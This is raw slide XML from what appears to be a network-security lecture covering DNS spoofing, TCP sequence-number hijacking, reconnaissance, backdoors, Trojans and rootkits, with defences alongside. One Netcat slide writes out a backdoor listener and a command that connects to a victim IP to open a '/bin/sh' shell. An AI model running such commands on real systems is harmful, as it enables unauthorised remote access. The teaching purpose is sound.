            <a:endCxn id="697" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="40894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66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1643063" y="4010025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66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2065362" y="3622239"/>
            <a:ext cx="8137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For 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" name="Google Shape;701;p66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3810000" y="2743200"/>
            <a:ext cx="24384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66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="41148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66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="41148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66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2417198" y="2347625"/>
            <a:ext cx="2031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X, MAC(A)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 have Y, MAC(A)</a:t>
            </a:r>
            <a:b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(unsolicited)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5867400" y="48006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6553200" y="21336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07" name="Google Shape;707;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429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708" name="Google Shape;708;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="42672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709" name="Google Shape;709;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1811538">
            <a:off x="4593700" y="3366086"/>
            <a:ext cx="16044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For X, MAC (A)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="710" name="Google Shape;710;p66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4419600" y="3048000"/>
            <a:ext cx="14478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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606800" y="2514600"/>
            <a:ext cx="2717800" cy="1354166"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="864" w="3216">
                <a:moveTo>
                  <a:pt x="3216" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2716" y="0"/>
                  <a:pt x="2216" y="0"/>
                  <a:pt x="1680" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1144" y="288"/>
                  <a:pt x="572" y="576"/>
                  <a:pt x="0" y="86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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1811538">
            <a:off x="4292782" y="2816335"/>
            <a:ext cx="1592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For X, MAC (X)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3" name="Google Shape;713;p66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4269048" y="2827568"/>
            <a:ext cx="14478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14" name="Google Shape;714;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1620700">
            <a:off x="3774108" y="4850455"/>
            <a:ext cx="1592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For X, MAC (X)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" name="Google Shape;715;p66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="-7367762">
            <a:off x="3893495" y="4280267"/>
            <a:ext cx="14478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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="84662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Spoofing DNS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="722" name="Google Shape;722;p67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sniffs DNS requests, replies with his own address faster than real server (DNS cache poisoning)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When real reply arrives client ignores it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This can be coupled with attack on HTTPS and SSH if self-signed certificates are allowed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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="63495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Sniffing Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="729" name="Google Shape;729;p68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end-to-end encryption like DNSSEC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="1" marL="10318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No one can sniff application traffic like DNS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="1" marL="10318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DNS servers would need to support encryption too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static switch configuration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Statically configure MAC and IP bindings with ports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No one can spoof ARP-IP mapping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Don’t accept suspicious certificates</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="1" marL="10318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Even if someone can hijack DNS names they cannot generate valid certificates</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="1" marL="10318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Prevents HTTPS/SSH attacks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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4331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IP Spoofing?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="736" name="Google Shape;736;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469335" y="11430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Faking somebody else’s IP address in IP source address field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How to spoof?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Linux and BSD OS have functions that enable superuser to create custom packets and fill in any information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Windows XP also has this capability but earlier Windows versions don’t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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4232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IP Address Spoofing in TCP packets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="743" name="Google Shape;743;p70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cannot see reply packets </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="Google Shape;744;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="4114800"/>
            <a:ext cx="12192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M</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="Google Shape;745;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="4114800"/>
            <a:ext cx="1219200" cy="685800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M</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Google Shape;746;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="2286000"/>
            <a:ext cx="1447800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect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M</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="747" name="Google Shape;747;p70"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="2743200"/>
            <a:ext cx="22098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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="2667000"/>
            <a:ext cx="2638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SYN, IP Alice, SEQ</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="-25000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749" name="Google Shape;749;p70"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2133600" y="4343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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="3886200"/>
            <a:ext cx="2989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SYN SEQ</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="-25000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ACK SEQ</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="-25000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51" name="Google Shape;751;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="4495800"/>
            <a:ext cx="4038600" cy="546100"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="344" w="2544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="412" y="164"/>
                  <a:pt x="824" y="328"/>
                  <a:pt x="1248" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1672" y="344"/>
                  <a:pt x="2108" y="196"/>
                  <a:pt x="2544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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3584575" y="5029200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RESET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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2695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Hijacking: Guessing a Sequence Number</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="759" name="Google Shape;759;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1883075"/>
            <a:ext cx="8229600" cy="4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wants to assume Alice’s identity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He establishes many connections to Bob with his own identity gets a few sequence numbers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He disables Alice (DDoS)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He sends SYN to Bob, Bob replies to Alice, attacker uses guessed value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng"/>
              <a:t>SEQ</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="-25000" lang="en-GB" sz="2400" u="sng"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>to complete connection </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP session hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="57943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How easy is it to guess SEQ</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="-25000" lang="en-GB" sz="2800"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr baseline="-25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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6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Guessing a Sequence Number</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="766" name="Google Shape;766;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1143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It used to be ISN=f(Time), still is in some Windows versions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="winseq" id="767" name="Google Shape;767;p7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75" y="2163763"/>
            <a:ext cx="5867400" cy="447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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4656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Guessing a Sequence Number</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="774" name="Google Shape;774;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1143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On Linux ISN=f(time)+rand</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="linseq" id="775" name="Google Shape;775;p7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892300"/>
            <a:ext cx="57912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85800" y="4233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Hi-Tech Reconnaissance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Search organization’s web site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Make sure not to post anything sensitive</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="0" marL="63182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Search information on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>various mailing list archives and interest groups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Instruct your employees what info should not be posted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Find out what is posted about you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Search the Web to find all documents mentioning this company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Find out what is posted about you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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6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Guessing a Sequence Number</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="782" name="Google Shape;782;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="11430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On BSD ISN=rand</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="bsdseq" id="783" name="Google Shape;783;p7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600200"/>
            <a:ext cx="5867400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Phase 4: Intrusion Goal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="790" name="Google Shape;790;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1295399"/>
            <a:ext cx="8153400" cy="5160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Stealing data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Causing damage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Encryption/ransom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Misusing resources for attacks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Sending attack traffic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Scanning for vulnerable hosts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Participating in C&amp;C network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Sending spam/phishing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Misusing resources for profit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="1" marL="10318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Bitcoin mining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GB" sz="3000"/>
              <a:t>Keeping machine for rent</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="98425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81000" lvl="1" marL="10318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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4656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Phase 5: Maintaining Access </a:t>
            </a:r>
            <a:endParaRPr sz="3959"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="Google Shape;797;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr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establishes a listening application on a port (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2800"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>) so he can log on any time with or without a password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="1" marL="10318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Open port, possibly with its own password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="1" marL="10318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Could also require certain sequence of events or be open only at certain times of day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Attackers frequently close security holes they find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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6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Netcat Tool</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="804" name="Google Shape;804;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="11430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Similar to Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2800"/>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>command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http://netcat.sourceforge.net/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Client: Initiates connection to any port on remote machine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Server: Listens on any port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To open a shell on a victim machine</a:t>
            </a:r>
            <a:endParaRPr/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victim machine: nc –l –p 1234</a:t>
            </a:r>
            <a:endParaRPr/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Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB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This opens a backdoor */ </a:t>
            </a:r>
            <a:endParaRPr/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attacker machine: nc 123.32.34.54 1234 –c /bin/sh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60488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Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB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This enters through a backdoor, opens a shell */ </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-254000" lvl="2" marL="13604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05" name="Google Shape;805;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781800" y="2590800"/>
            <a:ext cx="1219200" cy="1143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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6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Netcat Tool</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="812" name="Google Shape;812;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="11430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Used for </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-4572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Port scanning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-4572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Backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="9794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/>
              <a:t>Relaying the attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="6318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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3733800"/>
            <a:ext cx="1219200" cy="609600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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="3733800"/>
            <a:ext cx="1219200" cy="609600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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7391400" y="3505200"/>
            <a:ext cx="1219200" cy="6096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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4114800"/>
            <a:ext cx="1219200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF5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7" name="Google Shape;817;p78"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1295400" y="38862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78"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="3886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78"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6172200" y="3581400"/>
            <a:ext cx="1447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78"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6172200" y="3810000"/>
            <a:ext cx="1524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78"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3886200" y="41148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78"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1524000" y="4038600"/>
            <a:ext cx="1524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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="67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Trojans</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829" name="Google Shape;829;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="12954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Application that claims to do one thing (and looks like it) but it also does something malicious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Users download Trojans from Internet (thinking they are downloading a free game) or get them as greeting cards in E-mail, or as ActiveX controls when they visit a Web site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Trojans can scramble your machine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They can also open a backdoor on your system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They will also report successful infection to the attacker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Many Trojans are marketed as remote control software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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="8043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Trojan Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="836" name="Google Shape;836;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr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Antivirus software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Don’t download suspicious software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Check MD5 sum on trusted software you download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Disable automatic execution of attachments</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-3556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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3809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Phase 6: Covering Tracks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Google Shape;843;p81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Rootkits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Alter logs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Create hard-to-spot files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covert channels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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3809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Application Rootkits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Google Shape;850;p82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Alter or replace system components </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>(for instance DLLs)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E.g., on Linux attacker replaces </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2800"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t> program</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-533400" lvl="0" marL="631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Rootkits frequently come together with sniffers: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Capture a few characters of all sessions on the Ethernet and write into a file to steal passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="9794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Administrator would notice an interface in promiscuous mode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="13604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Not if attacker modifies an application that shows interfaces - </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2000"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5926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Application Rootkits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="857" name="Google Shape;857;p83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Attacker will modify all key system applications that could reveal his presence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List processes e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400"/>
              <a:t>ps</a:t>
            </a:r>
            <a:endParaRPr i="1"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List files e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr i="1"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Show open ports e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:endParaRPr i="1"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Show system utilization e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2400"/>
              <a:t>top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He will also substitute modification date with the one in the past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85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Whois and ARIN Databases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When an organization acquires domain name it provides information to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>registrar</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr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Public registrar files contain:</a:t>
            </a:r>
            <a:endParaRPr sz="28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Registered domain names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Range of IP addresses assigned to an organization</a:t>
            </a:r>
            <a:endParaRPr sz="2400"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Domain name servers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Contact people names, phone numbers,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>E-mail addresses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="723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ARIN database: American Registry for Internet Numbers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-460375" lvl="1" marL="97313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http://whois.arin.net/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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="8043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Defenses Against App. Rootkits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
